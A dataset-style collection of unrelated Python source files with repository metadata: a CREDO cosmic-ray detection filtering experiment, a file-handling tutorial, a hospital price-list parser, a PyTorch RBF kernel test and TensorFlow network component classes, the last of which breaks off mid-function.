Python
|
example/experiments/01_experiment.py
|
dzwiedziu-nkg/credo-classify-framework
|
45417b505b4f4b20a7248f3487ca57a3fd49ccee
|
[
"MIT"
] | null | null | null |
example/experiments/01_experiment.py
|
dzwiedziu-nkg/credo-classify-framework
|
45417b505b4f4b20a7248f3487ca57a3fd49ccee
|
[
"MIT"
] | null | null | null |
example/experiments/01_experiment.py
|
dzwiedziu-nkg/credo-classify-framework
|
45417b505b4f4b20a7248f3487ca57a3fd49ccee
|
[
"MIT"
] | 3
|
2020-06-19T15:41:19.000Z
|
2020-06-29T12:47:05.000Z
|
import bz2
import time
import urllib.request
import io
from typing import List, Tuple
from credo_cf import load_json_from_stream, progress_and_process_image, group_by_device_id, group_by_resolution, too_often, near_hot_pixel2, \
too_bright
from credo_cf import xor_preprocess
from credo_cf.commons.utils import get_and_add
WORKING_SET = 'http://mars.iti.pk.edu.pl/~nkg/credo/working_set.json.bz2'
time_profile = {}
def download_working_set(url: str) -> Tuple[List[dict], int]:
print('Download working set...')
data = urllib.request.urlopen(url).read()
print('Decompress...')
json_content = bz2.decompress(data).decode("utf-8")
print('Prase JSON...')
objs, count, errors = load_json_from_stream(io.StringIO(json_content), progress_and_process_image)
print('Parsed %d, skipped %d' % (count, count - len(objs)))
return objs, count
def start_analyze(all_detections):
# print('Make custom grayscale conversion...')
# for d in all_detections:
# convert_to_gray(d)
ts_load = time.time()
print('Group by devices...')
by_devices = group_by_device_id(all_detections)
get_and_add(time_profile, 'grouping', time.time() - ts_load)
drop_counts = {}
leave_good = 0
print('Run experiment...')
dev_no = 0
dev_count = len(by_devices.keys())
for device_id, device_detections in by_devices.items():
ts_load = time.time()
by_resolution = group_by_resolution(device_detections)
get_and_add(time_profile, 'grouping', time.time() - ts_load)
for resolution, detections in by_resolution.items():
dev_no += 1
print('Start device %d of %d, detectons count: %d' % (dev_no, dev_count, len(detections)))
# too_often
ts_load = time.time()
goods = detections
bads, goods = too_often(goods)
get_and_add(drop_counts, 'too_often', len(bads))
get_and_add(time_profile, 'too_often', time.time() - ts_load)
# too_bright
ts_load = time.time()
bads, goods = too_bright(goods, 70, 70)
get_and_add(time_profile, 'too_bright', time.time() - ts_load)
get_and_add(drop_counts, 'too_bright', len(bads))
# xor filter
ts_load = time.time()
if len(goods) > 1:
x_or = xor_preprocess(goods)
get_and_add(time_profile, 'xor', time.time() - ts_load)
# near_hot_pixel2
ts_load = time.time()
bads, goods = near_hot_pixel2(goods)
get_and_add(time_profile, 'near_hot_pixel2', time.time() - ts_load)
get_and_add(drop_counts, 'drop_near_hot_pixel2', len(bads))
# end, counting goods
leave_good += len(goods)
print('\nCount of cut off by filters:')
for f, v in drop_counts.items():
print('%s: %d' % (f, v))
print('Goods: %d' % leave_good)
def main():
# config data source, please uncomment and use one from both
ts_load = time.time()
# choice 1: download from website
working_sets = [download_working_set(WORKING_SET)] # download our working set from our hosting
# choice 2: load from files
# file_names = ['working_set.json']
# working_sets = [load_json(fn, progress_and_process_image) for fn in file_names]
get_and_add(time_profile, 'load', time.time() - ts_load)
for all_detections, count in working_sets:
start_analyze(all_detections)
print('\nTime count:')
for ts, tv in time_profile.items():
print('time: %03d - %s' % (int(tv), ts))
if __name__ == '__main__':
main()
| 31.782609
| 142
| 0.642681
| 507
| 3,655
| 4.335306
| 0.274162
| 0.038217
| 0.045041
| 0.044586
| 0.198817
| 0.153321
| 0.077343
| 0.077343
| 0.077343
| 0.047316
| 0
| 0.007565
| 0.240492
| 3,655
| 114
| 143
| 32.061404
| 0.784222
| 0.118468
| 0
| 0.128571
| 0
| 0.014286
| 0.120674
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.042857
| false
| 0
| 0.114286
| 0
| 0.171429
| 0.171429
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
f1f2f70605379c3a09598bf2b8739bb4f47caa1b
| 3,944
|
py
|
Python
|
30-Days-Of-Python/30-Days-Of-Python/19_file_handling.py
|
zhaobingwang/python-samples
|
d59f84d2b967cc793cb9b8999f8cdef349fd6fd5
|
[
"MIT"
] | null | null | null |
30-Days-Of-Python/30-Days-Of-Python/19_file_handling.py
|
zhaobingwang/python-samples
|
d59f84d2b967cc793cb9b8999f8cdef349fd6fd5
|
[
"MIT"
] | null | null | null |
30-Days-Of-Python/30-Days-Of-Python/19_file_handling.py
|
zhaobingwang/python-samples
|
d59f84d2b967cc793cb9b8999f8cdef349fd6fd5
|
[
"MIT"
] | null | null | null |
print('---------- Opening Files for Reading ----------')
f = open('./files/reading_file_example.txt')
print(f) # <_io.TextIOWrapper name='./files/reading_file_example.txt' mode='r' encoding='cp936'>
print('\t---------- read() ----------')
# read(): read the whole text as string. If we want to limit the number of characters we read,
# we can limit it by passing int value to the methods.
f = open('./files/reading_file_example.txt')
txt = f.read()
print(type(txt)) # <class 'str'>
print(txt) # Hello,Python!
f.close()
f = open('./files/reading_file_example.txt')
txt = f.read(5)
print(type(txt)) # <class 'str'>
print(txt) # Hello
f.close()
print('\t---------- readline(): read only the first line ----------')
f = open('./files/reading_file_example.txt')
line = f.readline()
print(type(line)) # <class 'str'>
print(line) # Hello,Python!
f.close()
print('\t---------- readlines(): read all the text line by line and returns a list of lines ----------')
f = open('./files/reading_file_example.txt')
lines = f.readlines()
print(type(lines)) # <class 'list'>
print(lines) # ['Hello,Python!']
f.close()
print('\t---------- splitlines() ----------')
f = open('./files/reading_file_example.txt')
lines = f.read().splitlines()
print(type(lines)) # <class 'list'>
print(lines) # ['Hello,Python!']
f.close()
print('\t---------- Another way to close a file ----------')
with open('./files/reading_file_example.txt') as f:
lines = f.read().splitlines()
print(type(lines)) # <class 'list'>
print(lines) # ['Hello,Python!']
print('---------- Opening Files for Writing and Updating ----------')
# To write to an existing file, we must add a mode as parameter to the open() function:
# "a" - append - will append to the end of the file, if the file does not exist it raise FileNotFoundError.
# "w" - write - will overwrite any existing content, if the file does not exist it creates.
with open('./files/writing_file_example.txt', 'a') as f:
f.write('Hello,Python!')
with open('./files/writing_file_example.txt', 'w') as f:
f.write('Hello,Java!')
print('---------- Deleting Files ----------')
import os
if os.path.exists('./files/writing_file_example.txt'):
os.remove('./files/writing_file_example.txt')
else:
os.remove('The file does not exist!')
print('---------- File Types ----------')
print('\t---------- File with json Extension ----------')
# dictionary
person_dct = {
"name": "Zhang San",
"country": "China",
"city": "Hangzhou",
"skills": ["Java", "C#", "Python"]
}
# JSON: A string form a dictionary
person_json = "{'name': 'Zhang San', 'country': 'China', 'city': 'Hangzhou', 'skills': ['Java', 'C#', 'Python']}"
# we use three quotes and make it multiple line to make it more readable
person_json = '''{
"name":"Zhang San",
"country":"China",
"city":"Hangzhou",
"skills":["Java", "C#","Python"]
}'''
print('\t---------- Changing JSON to Dictionary ----------')
import json
person_json = '''{
"name":"Zhang San",
"country":"China",
"city":"Hangzhou",
"skills":["Java", "C#","Python"]
}'''
person_dct = json.loads(person_json)
print(person_dct)
print(person_dct['name'])
print('\t---------- Changing Dictionary to JSON ----------')
person_dct = {
"name": "Zhang San",
"country": "China",
"city": "Hangzhou",
"skills": ["Java", "C#", "Python"]
}
person_json = json.dumps(person_dct, indent=4) # indent could be 2, 4, 8. It beautifies the json
print(type(person_json)) # <class 'str'>
print(person_json)
print('\t---------- Saving as JSON File ----------')
person_dct = {
"name": "Zhang San",
"country": "China",
"city": "Hangzhou",
"skills": ["Java", "C#", "Python"]
}
with open('./files/json_example.json', 'w', encoding='utf-8') as f:
json.dump(person_dct, f, ensure_ascii=False, indent=4)
print('\t---------- File with csv Extension ----------')
import csv
# with open('./files/csv_example.csv') as f:
| 31.806452
| 113
| 0.606491
| 542
| 3,944
| 4.333948
| 0.239852
| 0.056194
| 0.07152
| 0.078331
| 0.489144
| 0.43593
| 0.413367
| 0.338442
| 0.310345
| 0.281396
| 0
| 0.002979
| 0.148834
| 3,944
| 123
| 114
| 32.065041
| 0.696753
| 0.230223
| 0
| 0.526316
| 0
| 0.010526
| 0.533378
| 0.125208
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.031579
| 0
| 0.031579
| 0.326316
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
f1f6211abde32ba71ccaac35e7c39eb9935dfa7c
| 2,491
|
py
|
Python
|
data/grady-memorial-hospital/parse.py
|
Afellman/hospital-chargemaster
|
1b87bc64d95d97c0538be7633f9e469e5db624e2
|
[
"MIT"
] | 34
|
2019-01-18T00:15:58.000Z
|
2022-03-26T15:01:08.000Z
|
data/grady-memorial-hospital/parse.py
|
wsheffel/hospital-chargemaster
|
b3473c798fd2f343f7f02c1e32496f9eea9fa94d
|
[
"MIT"
] | 8
|
2019-01-16T22:06:11.000Z
|
2019-02-25T00:59:25.000Z
|
data/grady-memorial-hospital/parse.py
|
wsheffel/hospital-chargemaster
|
b3473c798fd2f343f7f02c1e32496f9eea9fa94d
|
[
"MIT"
] | 10
|
2019-02-20T14:58:16.000Z
|
2021-11-22T21:57:04.000Z
|
#!/usr/bin/env python
import os
from glob import glob
import json
import pandas
import datetime
import sys
here = os.path.dirname(os.path.abspath(__file__))
folder = os.path.basename(here)
latest = '%s/latest' % here
year = datetime.datetime.today().year
output_data = os.path.join(here, 'data-latest.tsv')
output_year = os.path.join(here, 'data-%s.tsv' % year)
# Function read zip into memory
def extract_zip(input_file):
input_zip = ZipFile(input_file)
return {name: input_zip.read(name) for name in input_zip.namelist()}
# Don't continue if we don't have latest folder
if not os.path.exists(latest):
print('%s does not have parsed data.' % folder)
sys.exit(0)
# Don't continue if we don't have results.json
results_json = os.path.join(latest, 'records.json')
if not os.path.exists(results_json):
print('%s does not have results.json' % folder)
sys.exit(1)
with open(results_json, 'r') as filey:
results = json.loads(filey.read())
columns = ['charge_code',
'price',
'description',
'hospital_id',
'filename',
'charge_type']
df = pandas.DataFrame(columns=columns)
for result in results:
filename = os.path.join(latest, result['filename'])
if not os.path.exists(filename):
print('%s is not found in latest folder.' % filename)
continue
if os.stat(filename).st_size == 0:
print('%s is empty, skipping.' % filename)
continue
contents = None
if filename.endswith('txt'):
# ['DESCRIPTION', 'Unnamed: 1', 'PRICE']
contents = pandas.read_csv(filename)
contents = contents.dropna(how='all')
print("Parsing %s" % filename)
print(contents.head())
# Update by row
for row in contents.iterrows():
idx = df.shape[0] + 1
price = row[1]['PRICE'].replace('$','').replace(',','').strip()
entry = [None, # charge code
price, # price
row[1]["DESCRIPTION"], # description
result['hospital_id'], # hospital_id
result['filename'],
'standard'] # filename
df.loc[idx,:] = entry
# Remove empty rows
df = df.dropna(how='all')
# Save data!
print(df.shape)
df.to_csv(output_data, sep='\t', index=False)
df.to_csv(output_year, sep='\t', index=False)
| 29.654762
| 75
| 0.583701
| 318
| 2,491
| 4.490566
| 0.349057
| 0.042017
| 0.028011
| 0.023109
| 0.118347
| 0.033613
| 0.033613
| 0.033613
| 0
| 0
| 0
| 0.004464
| 0.28061
| 2,491
| 83
| 76
| 30.012048
| 0.792411
| 0.109996
| 0
| 0.033898
| 0
| 0
| 0.133394
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.016949
| false
| 0
| 0.101695
| 0
| 0.135593
| 0.118644
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
f1f62ac7868b351e283f53daaf44f5e2562dfc27
| 10,476
|
py
|
Python
|
DeterministicParticleFlowControl/tests/test_pytorch_kernel.py
|
dimitra-maoutsa/DeterministicParticleFlowControl
|
106bc9b01d7a4888e4ded18c5fb5a989fe672386
|
[
"MIT"
] | 6
|
2021-12-13T14:30:31.000Z
|
2022-01-24T07:54:57.000Z
|
DeterministicParticleFlowControl/tests/test_pytorch_kernel.py
|
dimitra-maoutsa/DeterministicParticleFlowControl
|
106bc9b01d7a4888e4ded18c5fb5a989fe672386
|
[
"MIT"
] | 10
|
2021-12-18T23:04:53.000Z
|
2022-02-05T02:06:34.000Z
|
DeterministicParticleFlowControl/tests/test_pytorch_kernel.py
|
dimitra-maoutsa/DeterministicParticleFlowControl
|
106bc9b01d7a4888e4ded18c5fb5a989fe672386
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Mon Jan 10 07:20:39 2022
@author: maout
"""
import numpy as np
from scipy.spatial.distance import cdist
import torch
#from score_function_estimators import my_cdist
from typing import Union
from torch.autograd import grad
#%% select available device
def set_device():
device = "cuda" if torch.cuda.is_available() else "cpu"
if device != "cuda":
print("GPU is not enabled in this notebook. \n"
"If you want to enable it, in the menu under `Runtime` -> \n"
"`Hardware accelerator.` and select `GPU` from the dropdown menu")
else:
print("GPU is enabled in this notebook. \n"
"If you want to disable it, in the menu under `Runtime` -> \n"
"`Hardware accelerator.` and select `None` from the dropdown menu")
return device
#%%
class RBF(object):
"""
Class for implementing a Gaussian RBF kernel in pytorch.
Attributes
----------
length_scale : float or list or numpy.array
Length scale of the kernel. Either single float for a single
lengthscale across all dimension or a vector of floats for different
lengthscales across each dimension. Defauls is 1.0
signal_variance : float, optional
This not getting used yet. The default is 1.0.
device : Union[bool,str], optional
Selected device where the computations will be executed,i.e. cpu or gpu.
The default is None, which executes calculations on the cpu.
multil : Union[bool, None], optional
Boolean indicator determining whether lengthscale is a vector or a
single value. The default is False.
K_data : numpy.ndarray
Storage for the evaluation of the kernel on the datapoints (X, Y)
in order to be reused in the calculations of the gradient of the Kernel.
Methods
-------
Kernel(X, Y):
Computes the kernel for the inouts X, and Y. Stores and returns
the result at K_data. Input arrays are of dimensionality (N, D) and
(M, D) respectively. Resulting Kernel has (N, M) dimension.
gradient_X(X, Y):
Computes the gadient of the kernel with respect to the first argument
along all D dimensions.
"""
def __init__(self, length_scale: Union[float, torch.tensor, np.ndarray]=1.0, signal_variance: float=1.0, device: Union[bool,str]=None, multil: Union[bool, None]=False) -> None:
"""
Initialising function for RBF Gaussian kernels using pytorch.
Creates an object with necessary parammeters.
Parameters
----------
length_scale : Union[float, torch.tensor, np.ndarray], optional
Lenghtscale estimated from data. Can be either a single float,
or a vector for floats for different lengthscales for each dimension.
The default is 1.0.
signal_variance : float, optional
This not getting used yet. The default is 1.0.
device : Union[bool,str], optional
Selected device where the computations will be executed,i.e. cpu or gpu.
The default is None, which executes calculations on the cpu.
multil : Union[bool, None], optional
Boolean indicator determining whether lengthscale is a vector or a
single value. The default is False.
TO DO: Remove this option and just check whether length_scale input
is a vector or a single float.
Returns
-------
Instance of the object.
"""
# initialize parameters
if device is None:
self.device = torch.device("cpu")
else:
self.device = device
self.length_scale = torch.tensor(length_scale, dtype=torch.float32, device=self.device,
requires_grad=True)
self.signal_variance = torch.tensor(signal_variance, dtype=torch.float32, device=self.device,
requires_grad=True)
self.multil = torch.tensor(multil, dtype=torch.bool, device=self.device, requires_grad=False)
if self.multil:
##expand dimensions of lengtscale vector to enable broadcasting
self.length_scale = self.length_scale[None, None, :]
self.K_data = torch.tensor(0, dtype=torch.float32, device=self.device, requires_grad=False)
def Kernel(self, X: np.ndarray, Y: Union[bool, np.ndarray]=None) -> np.ndarray:
if not torch.is_tensor(X):
# convert inputs to pytorch tensors if not already pytorched
X = torch.tensor(X, dtype=torch.float32, device=self.device)
N, D = X.shape
if Y is None:
Y = X
elif not torch.is_tensor(Y):
Y = torch.tensor(Y, dtype=torch.float32, device=self.device)
M, _ = Y.shape
# Re-indexing
X_i = X[:, None, :] # shape (N, D) -> (N, 1, D)
Y_j = Y[None, :, :] # shape (M, D) -> (1, M, D)
if not self.multil: ##if a single lengthscale is provided
# |X_i - Y_j|^2 # (N, M, D)
sqd = torch.sum( (X_i - Y_j)**2, 2)
# Divide by length scale
sqd = torch.div(sqd, self.length_scale.to(self.device)**2)
K = torch.exp( -0.5* sqd )
else:
sqd1 = torch.div( (X_i - Y_j)**2, self.length_scale.to(self.device)**2)
sqd = torch.sum( sqd1, 2)
K = torch.exp( -0.5* sqd )
K = torch.mul(self.signal_variance, K) # Signal Variance
self.K_data = K
return K#.detach().to_numpy()
def gradient_X(self, X: np.ndarray, Y: Union[bool, np.ndarray]=None) -> np.ndarray:
N, D = X.shape
M,_ = Y.shape
diffs = X[:,None]-Y
redifs = torch.div(diffs, self.length_scale.to(self.device)**2)
redifs = torch.einsum( 'ijk,ij->ijk', redifs, self.K_data)
return redifs
def gradient_X2(self, X):
return None
def gradient_XX(self,X: np.ndarray, Y: Union[bool, np.ndarray]=None) -> np.ndarray:
# Convert to tensor that requires Grad
X = torch.tensor(self.length_scale, dtype=torch.float32, device=self.device,requires_grad=True)
if Y is None:
Y = X
else:
Y = torch.tensor(Y, dtype=torch.float32, device=self.device, requires_grad=True)
# compute the gradient kernel w.r.t. to the two inputs
J = grad(self.__call__(X, Y))
return J
def gradient_XX2(self, X, Y=None):
return None
#%% numpy versions of kernels functions
def Knp(x,y,l,multil=False):
if multil:
res = np.ones((x.shape[0],y.shape[0]))
for ii in range(len(l)):
tempi = np.zeros((x[:,ii].size, y[:,ii].size ))
##puts into tempi the cdist result
tempi = cdist(x[:,ii].reshape(-1,1), y[:,ii].reshape(-1,1),metric='sqeuclidean')
res = np.multiply(res,np.exp(-tempi/(2*l[ii]*l[ii])))
return res
else:
tempi = np.zeros((x.shape[0], y.shape[0] ))
tempi = cdist(x, y,'sqeuclidean') #this sets into the array tempi the cdist result
return np.exp(-0.5*tempi/(l*l))
def grdx_K_all(x,y,l,multil=False): #gradient with respect to the 1st argument - only which_dim
N,dim = x.shape
M,_ = y.shape
diffs = x[:,None]-y
redifs = np.zeros((1*N,M,dim))
for ii in range(dim):
if multil:
redifs[:,:,ii] = np.multiply(diffs[:,:,ii],Knp(x,y,l,True))/(l[ii]*l[ii])
else:
redifs[:,:,ii] = np.multiply(diffs[:,:,ii],Knp(x,y,l))/(l*l)
return redifs
#%%
DEVICE = set_device()
dtype = torch.float
dim = 2
N = 3
M = 4
X = torch.randn(N, dim, device=DEVICE)
Z = torch.randn(M, dim, device=DEVICE)
# common device agnostic way of writing code that can run on cpu OR gpu
# that we provide for you in each of the tutorials
#%% test kernel evaluation with single lengthscale
lengthsc = 2
# pytorched
K_instance = RBF(length_scale=lengthsc, multil=False, device=DEVICE) ##instance of kernel object - non-evaluated
if DEVICE=='cpu':
Ktorch = K_instance.Kernel(X, Z).detach().numpy()
gradK_torch = K_instance.gradient_X(X, Z).detach().numpy()
else:
Ktorch = K_instance.Kernel(X, Z).cpu().detach().numpy()
gradK_torch = K_instance.gradient_X(X, Z).cpu().detach().numpy()
# numpyed
if DEVICE=='cpu':
K_numpy = Knp(X.detach().numpy(), Z.detach().numpy(),l=lengthsc, multil=False).astype(np.float32)
grad_K_numpy = grdx_K_all(X.detach().numpy(), Z.detach().numpy(), l=lengthsc, multil=False).astype(np.float32)
else:
K_numpy = Knp(X.cpu().detach().numpy(), Z.cpu().detach().numpy(),l=lengthsc, multil=False).astype(np.float32)
grad_K_numpy = grdx_K_all(X.cpu().detach().numpy(), Z.cpu().detach().numpy(), l=lengthsc, multil=False).astype(np.float32)
np.testing.assert_allclose(Ktorch, K_numpy, rtol=1e-06)
np.testing.assert_allclose(gradK_torch, grad_K_numpy, rtol=1e-06)
#%% test kernel evaluation with multiple lengthscales
lengthsc = np.array([1,2])
# pytorched
if DEVICE=='cpu':
K_instance2 = RBF(length_scale=lengthsc, multil=True, device=DEVICE) ##instance of kernel object - non-evaluated
Ktorch = K_instance2.Kernel(X, Z).detach().numpy()
gradK_torch = K_instance2.gradient_X(X, Z).detach().numpy()
else:
K_instance2 = RBF(length_scale=lengthsc, multil=True, device=DEVICE) ##instance of kernel object - non-evaluated
Ktorch = K_instance2.Kernel(X, Z).cpu().detach().numpy()
gradK_torch = K_instance2.gradient_X(X, Z).cpu().detach().numpy()
# numpyed
if DEVICE=='cpu':
K_numpy = Knp(X.detach().numpy(), Z.detach().numpy(),l=lengthsc, multil=True).astype(np.float32)
grad_K_numpy = grdx_K_all(X.detach().numpy(), Z.detach().numpy(), l=lengthsc, multil=True).astype(np.float32)
else:
K_numpy = Knp(X.cpu().detach().numpy(), Z.cpu().detach().numpy(),l=lengthsc, multil=True).astype(np.float32)
grad_K_numpy = grdx_K_all(X.cpu().detach().numpy(), Z.cpu().detach().numpy(), l=lengthsc, multil=True).astype(np.float32)
np.testing.assert_allclose(Ktorch, K_numpy, rtol=1e-06)
np.testing.assert_allclose(gradK_torch, grad_K_numpy, rtol=1e-06)
| 37.683453
| 180
| 0.612447
| 1,491
| 10,476
| 4.22334
| 0.18444
| 0.041925
| 0.026679
| 0.019057
| 0.510719
| 0.494521
| 0.464507
| 0.441798
| 0.413054
| 0.397808
| 0
| 0.014371
| 0.262696
| 10,476
| 278
| 181
| 37.683453
| 0.80088
| 0.317106
| 0
| 0.283582
| 0
| 0
| 0.055916
| 0
| 0
| 0
| 0
| 0
| 0.029851
| 1
| 0.067164
| false
| 0
| 0.037313
| 0.014925
| 0.179104
| 0.014925
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
f1f6905a9916f479816181eeb443cb6b650cc61b
| 11,075
|
py
|
Python
|
components.py
|
zachgk/tfcomponents
|
6c33349ab13549debfc9b347df795c82e38cfa73
|
[
"MIT"
] | null | null | null |
components.py
|
zachgk/tfcomponents
|
6c33349ab13549debfc9b347df795c82e38cfa73
|
[
"MIT"
] | null | null | null |
components.py
|
zachgk/tfcomponents
|
6c33349ab13549debfc9b347df795c82e38cfa73
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import division, print_function, absolute_import
import tensorflow as tf
import tflearn
from tflearn import variables as vs
from tflearn import activations
from tflearn import initializations
from tflearn import losses
from tflearn import utils
def condition(cond, t, f):
if cond is True:
return t
elif cond is False:
return f
else:
return tf.cond(cond, lambda: t, lambda: f)
class objectview(object):
def __init__(self, d):
self.__dict__.update(d)
componentInherit = {
'globalDroppath': False,
'localDroppath': False,
'localDroppathProb': .5,
'parentType': '',
'currentType': ''
}
class TFComponent:
def __getitem__(self, incoming):
global componentInherit
inheritBak = componentInherit.copy()
if 'localDroppath' in self.opts:
componentInherit['localDroppath'] = self.opts['localDroppath']
if 'globalDroppath' in self.opts:
componentInherit['globalDroppath'] = self.opts['globalDroppath']
componentInherit['parentType'] = componentInherit['currentType']
componentInherit['currentType'] = type(self).__name__
opts = objectview(self.opts)
if isinstance(incoming, TFComponentVal) and (not hasattr(self, 'noDirect')):
incoming = incoming.resolve()
net = self.get(incoming, opts, componentInherit)
if isinstance(net, TFComponentVal) and componentInherit['parentType'] is '':
net = net.resolve()
componentInherit = inheritBak
return net
class TFComponentVal:
pass
class Identity(TFComponent):
def __init__(self, **kwargs):
self.noDirect = True
self.opts = {
}
self.opts.update(kwargs)
def get(self, incoming, opts, inherit):
return incoming
class Sequence(TFComponent):
def __init__(self, blocks, **kwargs):
self.noDirect = True
self.blocks = blocks
self.opts = {
'name': "Sequence"
}
self.opts.update(kwargs)
def get(self, incoming, opts, inherit):
resnet = incoming
with tf.name_scope(opts.name):
for blk in self.blocks:
resnet = blk[resnet]
return resnet
class ParallelVal(TFComponentVal):
def __init__(self, opts, inherit, scope):
self.blocks = list()
self.opts = opts
self.inherit = inherit
self.scope = scope
def resolve(self):
opts = self.opts
inherit = self.inherit
with tf.name_scope(self.scope):
is_training = tflearn.get_training_mode()
blocks = tf.pack(self.blocks)
basic = tf.reduce_sum(blocks, 0)
oneChoice = tf.random_uniform([], maxval=len(self.blocks), dtype='int32')
one = tf.cond(is_training, lambda: tf.gather(blocks,oneChoice), lambda: basic)
someChoice = tf.less(tf.random_uniform([len(self.blocks)]), inherit['localDroppathProb'])
some = tf.cond(is_training, lambda: tf.reduce_sum(tf.boolean_mask(blocks,someChoice), 0), lambda: basic)
some = tf.cond(tf.reduce_any(someChoice), lambda: some, lambda: one)
resnet = condition(inherit['globalDroppath'], one, condition(inherit['localDroppath'], some, basic))
return resnet
class Parallel(TFComponent):
def __init__(self, blocks, **kwargs):
self.noDirect = True
self.blocks = blocks
self.opts = {
'name': "Parallel"
}
self.opts.update(kwargs)
def get(self, incoming, opts, inherit):
resnet = incoming
with tf.name_scope(opts.name) as scope:
blocksMixed = [blk[resnet] for blk in self.blocks]
blocks = ParallelVal(opts, inherit, scope)
for blk in blocksMixed:
if isinstance(blk, ParallelVal):
blocks.blocks = blocks.blocks + blk.blocks
else:
blocks.blocks.append(blk)
return blocks
class Chain(TFComponent):
def __init__(self, size, block, **kwargs):
self.noDirect = True
self.size = size
self.block = block
self.opts = {
'name': "Chain"
}
self.opts.update(kwargs)
def get(self, incoming, opts, inherit):
resnet = incoming
with tf.name_scope(opts.name):
for i in range(self.size):
resnet = self.block[resnet]
return resnet
class Fractal(TFComponent):
def __init__(self, size, block, **kwargs):
self.noDirect = True
self.size = size
self.block = block
self.opts = {
'name': "Fractal"
}
self.opts.update(kwargs)
def get(self, incoming, opts, inherit):
resnet = incoming
with tf.name_scope(opts.name):
if self.size <= 1:
return self.block[resnet]
else:
sub = Fractal(self.size-1, self.block)
resnet = Parallel([self.block, Chain(2, sub)])[resnet]
return resnet
class Residual(TFComponent):
def __init__(self, block, **kwargs):
self.noDirect = True
self.block = block
self.opts = {
'name': "Residual"
}
self.opts.update(kwargs)
def get(self, incoming, opts, inherit):
resnet = incoming
with tf.name_scope(opts.name):
resnet = Parallel([Identity(), self.block])
return resnet
class Conv2d(TFComponent):
def __init__(self, nb_filter, filter_size, **kwargs):
self.nb_filter = nb_filter
self.filter_size = filter_size
self.opts = {
'strides': 1,
'padding': 'same',
'activation': 'linear',
'bias': True,
'weights_init': 'uniform_scaling',
'bias_init': 'zeros',
'regularizer': None,
'weight_decay': 0.001,
'trainable': True,
'restore': True,
'name': "Conv2D"
}
self.opts.update(kwargs)
def get(self, incoming, opts, inherit):
assert opts.padding in ['same', 'valid', 'SAME', 'VALID'], \
"Padding must be same' or 'valid'"
input_shape = utils.get_incoming_shape(incoming)
assert len(input_shape) == 4, "Incoming Tensor shape must be 4-D"
filter_size = utils.autoformat_filter_conv2d(self.filter_size,
input_shape[-1],
self.nb_filter)
strides = utils.autoformat_kernel_2d(opts.strides)
padding = utils.autoformat_padding(opts.padding)
with tf.name_scope(opts.name) as scope:
W_init = opts.weights_init
if isinstance(opts.weights_init, str):
W_init = initializations.get(opts.weights_init)()
W_regul = None
if opts.regularizer:
W_regul = lambda x: losses.get(opts.regularizer)(x, opts.weight_decay)
W = vs.variable(scope + 'W', shape=filter_size,
regularizer=W_regul, initializer=W_init,
trainable=opts.trainable, restore=opts.restore)
# Track per layer variables
tf.add_to_collection(tf.GraphKeys.LAYER_VARIABLES + '/' + scope, W)
b = None
if opts.bias:
b_init = initializations.get(opts.bias_init)()
b = vs.variable(scope + 'b', shape=self.nb_filter,
initializer=b_init, trainable=opts.trainable,
restore=opts.restore)
# Track per layer variables
tf.add_to_collection(tf.GraphKeys.LAYER_VARIABLES + '/' + scope, b)
inference = tf.nn.conv2d(incoming, W, strides, padding)
if b: inference = tf.nn.bias_add(inference, b)
if isinstance(opts.activation, str):
inference = activations.get(opts.activation)(inference)
elif hasattr(activation, '__call__'):
inference = activation(inference)
else:
raise ValueError("Invalid Activation.")
# Track activations.
tf.add_to_collection(tf.GraphKeys.ACTIVATIONS, inference)
# Add attributes to Tensor to easy access weights.
inference.scope = scope
inference.W = W
inference.b = b
return inference
class ShallowResidualBlock(TFComponent):
def __init__(self, out_channels, **kwargs):
self.out_channels = out_channels
self.opts = {
'downsample': False,
'downsample_strides': 2,
'activation': 'relu',
'batch_norm': True,
'bias': True,
'weights_init': 'variance_scaling',
'bias_init': 'zeros',
'regularizer': 'L2',
'weight_decay': 0.0001,
'trainable': True,
'restore': True,
'name': 'ResidualBlock'
}
self.opts.update(kwargs)
def get(self, incoming, opts, inherit):
resnet = incoming
in_channels = incoming.get_shape().as_list()[-1]
with tf.name_scope(opts.name):
identity = resnet
if not downsample:
opts.downsample_strides = 1
if opts.batch_norm:
resnet = tflearn.batch_normalization(resnet)
resnet = tflearn.activation(resnet, opts.activation)
resnet = conv_2d(resnet, self.out_channels, 3,
opts.downsample_strides, 'same', 'linear',
opts.bias, opts.weights_init, opts.bias_init,
opts.regularizer, opts.weight_decay, opts.trainable,
opts.restore)
if opts.batch_norm:
resnet = tflearn.batch_normalization(resnet)
resnet = tflearn.activation(resnet, opts.activation)
resnet = conv_2d(resnet, self.out_channels, 3, 1, 'same',
'linear', opts.bias, opts.weights_init,
opts.bias_init, opts.regularizer, opts.weight_decay,
opts.trainable, opts.restore)
# Downsampling
if opts.downsample_strides > 1:
identity = tflearn.avg_pool_2d(identity, 1,
opts.downsample_strides)
# Projection to new dimension
if in_channels != self.out_channels:
ch = (self.out_channels - in_channels)//2
